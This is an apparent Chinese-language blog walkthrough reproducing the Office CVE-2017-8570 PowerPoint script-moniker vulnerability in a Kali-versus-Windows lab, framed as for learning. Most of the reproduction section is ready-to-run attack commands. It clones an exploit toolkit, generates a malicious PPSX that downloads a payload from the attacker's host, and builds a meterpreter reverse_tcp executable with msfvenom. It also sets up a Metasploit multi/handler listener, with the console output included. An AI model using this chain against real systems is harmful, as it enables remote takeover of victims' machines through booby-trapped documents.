admin管理员组

文章数量:1600386

Office CVE-2017-8570漏洞复现

    • 说明
    • 描述
    • 漏洞影响版本
    • 环境说明
    • 漏洞复现
    • 参考

说明

本文仅供学习使用。如有不足,请多指正。

描述

2017年7月,微软在例行的阅读补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞。网上公布了利用代码,影响范围广泛。该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsof PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows script Component)文件。可以欺骗用户运行含有该漏洞的PPT文件导致获取和当前登录用户相同的执行权限。

漏洞影响版本

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

环境说明

  • 攻击机:kali
  • 靶机:windows2016(已安装好64位的Microsoft Office 2016)

漏洞复现

  1. 下载漏洞exp到攻击机kali上。
    git clone https://github/tezukanice/Office8570.git
  2. 切换到Office8570目录下,然后新建目录,将原本已有的ppsx文件另存到template。
    cd Office8570
    mkdir template
    mv template.ppsx template/

    ps:如果此处不想创建文件夹,可以cd cve-2017-8570_toolkit.py进入文件中修改路径:
  3. 在本地生成恶意的PPSX文件,这里的IP是攻击机的IP:
    python2 cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://#{IP}/logo.doc
  4. 在kali上使用meterpreter的反弹木马生成反弹shell的exe文件。
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=#{IP} LPORT=#{PORT} -f exe > #{filename}
  5. 设置监听。等待恶意ppsx文件的执行,继而接收ppsx请求来下载执行kali本地反弹木马shell(默认在80监听,ip为攻击机的ip地址)。
    python2 cve-2017-8570_toolkit.py -M exp -e http://#{ip}/#{filename} -l #{filename}
  6. 新起一个攻击机的窗口,打开metasploit工具,使用multi/handler加载攻击模块,设置监听。
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost #{ip}
lhost => #{ip}

msf6 exploit(multi/handler) > set lport #{port}
lport => #{port}

msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on #{ip}:#{port} 
  1. 将刚才生成的恶意的ppsx文件放在目标主机上执行,模拟用户点击黑客发送的恶意文件。
  2. 查看成功接收到目标机发送的获取payload的请求。
  3. 查看MSF那边也已经获得shell。

参考

https://zhuanlan.zhihu/p/40969485
http://www.noobyard/article/p-fiujnodz-ss.html
https://fish-o0o.github.io/2018/06/26/CVE-2017-8570

本文标签: 漏洞CVEoffice